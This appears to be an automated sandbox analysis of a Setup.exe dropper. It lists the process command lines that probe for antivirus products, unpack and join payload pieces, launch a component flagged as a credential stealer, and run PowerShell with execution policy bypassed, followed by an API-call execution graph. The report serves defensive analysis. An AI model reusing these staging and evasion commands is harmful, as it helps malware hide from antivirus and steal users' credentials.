                                                                                                                                                                            2024-12-22 22:29:18 UTC1013INData Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e
                                                                                                                                                                            Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span
                                                                                                                                                                            2024-12-22 22:29:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:17:28:06
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:73'409'776 bytes
                                                                                                                                                                            MD5 hash:7A2ED58357C7DC7A63754E88AF43A860
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:2
                                                                                                                                                                            Start time:17:28:07
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd
                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:17:28:07
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:17:28:09
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                            Imagebase:0xd80000
                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:5
                                                                                                                                                                            Start time:17:28:09
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:17:28:09
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                            Imagebase:0xd80000
                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:7
                                                                                                                                                                            Start time:17:28:09
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:8
                                                                                                                                                                            Start time:17:28:10
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:cmd /c md 124531
                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:9
                                                                                                                                                                            Start time:17:28:10
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:extrac32 /Y /E Lt
                                                                                                                                                                            Imagebase:0xb30000
                                                                                                                                                                            File size:29'184 bytes
                                                                                                                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:10
                                                                                                                                                                            Start time:17:28:10
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:findstr /V "Heater" Lance
                                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:11
                                                                                                                                                                            Start time:17:28:11
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z
                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:12
                                                                                                                                                                            Start time:17:28:11
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:Designing.com z
                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                            File size:947'288 bytes
                                                                                                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2535381458.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:13
                                                                                                                                                                            Start time:17:28:11
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:choice /d y /t 5
                                                                                                                                                                            Imagebase:0xec0000
                                                                                                                                                                            File size:28'160 bytes
                                                                                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:16
                                                                                                                                                                            Start time:17:29:17
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f638cc2ab095e5f</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html>
                                                                                                                                                                            Imagebase:0xe00000
                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:17
                                                                                                                                                                            Start time:17:29:17
                                                                                                                                                                            Start date:22/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:17.7%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:21%
                                                                                                                                                                              Total number of Nodes:1482
                                                                                                                                                                              Total number of Limit Nodes:27
                                                                                                                                                                              execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 